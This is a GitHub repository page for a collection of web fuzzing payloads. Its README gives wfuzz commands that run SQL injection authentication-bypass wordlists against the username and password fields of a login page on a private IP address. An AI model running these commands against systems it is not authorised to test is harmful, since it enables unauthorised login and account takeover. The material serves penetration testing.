Skip to content

sayanthanpera/web-fuzzing-payloads

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

web-fuzzing-payloads

Use this payloads to web fuzzing test

Usage

web-fuzzing-payloads/sqli/auth_bypass_sqli.txt

wfuzz -c --hh=10 -u http://172.16.76.158:8080/login.php -w auth_bypass_sqli.txt -d "username=FUZZ&password=sa1"

wfuzz -c --hh=10 -u http://172.16.76.158:8080/login.php -w auth_bypass_sqli.txt -d "username=sayaa&password=FUZZ"

wfuzz -c --hh=10 -u http://172.16.76.158:8080/login.php -z file,auth_bypass_sqli.txt -z file,auth_bypass_sqli.txt -d "username=FUZZ&password=FUZ2Z"

web-fuzzing-payloads/sqli/auth_bypass_with_hash_check_sqli.txt

wfuzz -c --hh=10 -u http://172.16.76.158:8080/login.php -w auth_bypass_with_hash_check_sqli.txt -d "username=FUZZ&password=password123"

About

Use this payloads to web fuzzing test

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published